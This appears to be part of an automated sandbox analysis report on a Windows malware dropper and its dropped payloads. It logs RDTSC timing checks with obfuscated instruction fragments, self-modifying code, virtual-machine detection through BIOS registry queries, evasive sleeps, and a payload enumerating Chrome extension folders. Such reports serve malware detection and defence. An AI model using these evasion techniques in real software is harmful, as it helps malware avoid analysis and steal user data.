Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F902EA second address: 4F90302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD5513FC24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90302 second address: 4F90387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FDDC7B7A738h 0x00000011 pushad 0x00000012 mov ax, 64FBh 0x00000016 mov bx, si 0x00000019 popad 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 jmp 00007FDD5537C43Ah 0x00000026 je 00007FDDC7B7A72Eh 0x0000002c pushad 0x0000002d mov ebx, ecx 0x0000002f pushad 0x00000030 jmp 00007FDD5537C448h 0x00000035 push esi 0x00000036 pop edi 0x00000037 popad 0x00000038 popad 0x00000039 mov edx, dword ptr [esi+44h] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007FDD5537C444h 0x00000045 sbb ecx, 6288BD08h 0x0000004b jmp 00007FDD5537C43Bh 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90387 second address: 4F9040B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 313118AAh 0x00000008 pushfd 0x00000009 jmp 00007FDD5513FC1Bh 0x0000000e and esi, 42905D4Eh 0x00000014 jmp 00007FDD5513FC29h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d or edx, dword ptr [ebp+0Ch] 0x00000020 pushad 0x00000021 jmp 00007FDD5513FC1Ch 0x00000026 pushfd 0x00000027 jmp 00007FDD5513FC22h 0x0000002c xor ah, FFFFFFF8h 0x0000002f jmp 00007FDD5513FC1Bh 0x00000034 popfd 0x00000035 popad 0x00000036 test edx, 61000000h 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FDD5513FC20h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9040B second address: 4F9041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9041A second address: 4F90440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FDDC793DE7Ch 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop ebx 0x00000014 popad 0x00000015 push ecx 0x00000016 mov si, bx 0x00000019 pop edx 0x0000001a popad 0x0000001b test byte ptr [esi+48h], 00000001h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90440 second address: 4F90445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F807D7 second address: 4F807DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F807DD second address: 4F807E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F807E1 second address: 4F807FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDD5513FC21h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F807FD second address: 4F80841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD5537C447h 0x00000008 mov bx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007FDD5537C447h 0x00000019 pop eax 0x0000001a mov edx, 4ED0D27Ch 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80841 second address: 4F808E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD5513FC20h 0x00000008 pushfd 0x00000009 jmp 00007FDD5513FC22h 0x0000000e sub cx, 6CC8h 0x00000013 jmp 00007FDD5513FC1Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f jmp 00007FDD5513FC24h 0x00000024 mov di, cx 0x00000027 popad 0x00000028 and esp, FFFFFFF8h 0x0000002b jmp 00007FDD5513FC1Ch 0x00000030 xchg eax, ebx 0x00000031 jmp 00007FDD5513FC20h 0x00000036 push eax 0x00000037 pushad 0x00000038 push edx 0x00000039 pop edi 0x0000003a popad 0x0000003b xchg eax, ebx 0x0000003c jmp 00007FDD5513FC22h 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FDD5513FC27h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F808E8 second address: 4F80900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD5537C444h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80900 second address: 4F809A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FDD5513FC25h 0x00000014 sbb ecx, 10A51216h 0x0000001a jmp 00007FDD5513FC21h 0x0000001f popfd 0x00000020 mov di, cx 0x00000023 popad 0x00000024 push esi 0x00000025 movsx ebx, cx 0x00000028 pop esi 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FDD5513FC21h 0x00000032 sub cx, 8626h 0x00000037 jmp 00007FDD5513FC21h 0x0000003c popfd 0x0000003d push esi 0x0000003e pushad 0x0000003f popad 0x00000040 pop edx 0x00000041 popad 0x00000042 mov esi, dword ptr [ebp+08h] 0x00000045 pushad 0x00000046 mov di, cx 0x00000049 movzx eax, dx 0x0000004c popad 0x0000004d mov ebx, 00000000h 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FDD5513FC29h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F809A7 second address: 4F809DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov dx, cx 0x0000000f mov bx, cx 0x00000012 popad 0x00000013 je 00007FDDC7B81DFEh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDD5537C441h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F809DF second address: 4F809E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F809E5 second address: 4F80A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f pushad 0x00000010 mov cx, bx 0x00000013 mov edi, 488D7994h 0x00000018 popad 0x00000019 mov ecx, esi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FDD5537C449h 0x00000022 sbb ch, 00000006h 0x00000025 jmp 00007FDD5537C441h 0x0000002a popfd 0x0000002b jmp 00007FDD5537C440h 0x00000030 popad 0x00000031 je 00007FDDC7B81D98h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80A4D second address: 4F80A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80A51 second address: 4F80A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80A57 second address: 4F80A9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [77816968h], 00000002h 0x00000010 pushad 0x00000011 mov si, FEDDh 0x00000015 push esi 0x00000016 push edx 0x00000017 pop esi 0x00000018 pop ebx 0x00000019 popad 0x0000001a jne 00007FDDC794554Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDD5513FC27h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80A9F second address: 4F80AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80AA5 second address: 4F80AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80AA9 second address: 4F80AD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDD5537C445h 0x00000015 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 101E60C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E6C43E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 57E60C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 3CC43E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Special instruction interceptor: First address: 825BBB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Special instruction interceptor: First address: 825C5A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Special instruction interceptor: First address: 8231AE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Special instruction interceptor: First address: 60FA97 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Special instruction interceptor: First address: 7BA856 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Memory allocated: 3200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Memory allocated: 3400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Memory allocated: 3200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Memory allocated: E20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Memory allocated: 27A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Memory allocated: 47A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Memory allocated: 13F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Memory allocated: 3030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Memory allocated: 2E60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Memory allocated: 30C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Memory allocated: 3280000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Memory allocated: 5280000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05010508 rdtsc

0_2_05010508

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 689	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2357	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 644	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 664	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 392	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Window / User API: threadDelayed 1123

Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wwGF52ZwewEf8fwf9S3wwVeD\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1014885001\5eff75a611.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1014884001\9ffcf1ab77.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wwGF52ZwewEf8fwf9S3wwVeD\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_15-11780
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Evasive API call chain: GetSystemTime,DecisionNodes			graph_17-14214

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8052	Thread sleep count: 689 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8052	Thread sleep time: -1378689s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8056	Thread sleep count: 680 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8056	Thread sleep time: -1360680s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8032	Thread sleep count: 220 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8032	Thread sleep time: -6600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8060	Thread sleep count: 2357 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8060	Thread sleep time: -4716357s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8072	Thread sleep count: 644 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8072	Thread sleep time: -1288644s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080	Thread sleep count: 664 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080	Thread sleep time: -1328664s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8068	Thread sleep count: 684 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8068	Thread sleep time: -1368684s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8076	Thread sleep count: 392 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8076	Thread sleep time: -784392s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe TID: 6220	Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7492	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7492	Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7496	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7496	Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7448	Thread sleep count: 87 > 30
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7448	Thread sleep count: 197 > 30
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7448	Thread sleep count: 188 > 30
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7448	Thread sleep count: 187 > 30
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 2440	Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7476	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7476	Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7484	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7468	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7468	Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7472	Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe TID: 7472	Thread sleep time: -80040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe TID: 3040	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 3128	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 3128	Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 6968	Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 2496	Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 1304	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 1304	Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 1320	Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 1320	Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 5492	Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 2552	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 2552	Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 3200	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe TID: 3200	Thread sleep time: -76038s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe

Thread sleep count: Count: 1123 delay: -10

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File Volume queried: unknown FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B1D871 FindFirstFileExW,	15_2_00B1D871
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B1D922 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_00B1D922
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0040DE0C FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	17_2_0040DE0C
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00401825 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_00401825
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0040CCF2 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,FindNextFileA,FindClose,	17_2_0040CCF2
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0040B942 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,FindNextFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,	17_2_0040B942
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0040D820 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_0040D820
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_008192FC GetProcessHeap,FindFirstFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	17_2_008192FC
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0081AE0D SHGetFolderPathA,wsprintfA,FindFirstFileA,strcmp,strcmp,_mbscpy,_splitpath,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,	17_2_0081AE0D
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0081986A FindFirstFileA,StrCmpCA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	17_2_0081986A
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00818952 FindFirstFileA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	17_2_00818952
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 18_2_00B1D871 FindFirstFileExW,	18_2_00B1D871
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 18_2_00B1D922 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	18_2_00B1D922
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_004176E7 FindFirstFileExW,	20_2_004176E7
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_10007EA9 FindFirstFileExW,	20_2_10007EA9
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B4794E FindFirstFileExW,	20_2_04B4794E

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Code function: 17_2_008142CC GetSystemInfo,

17_2_008142CC

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
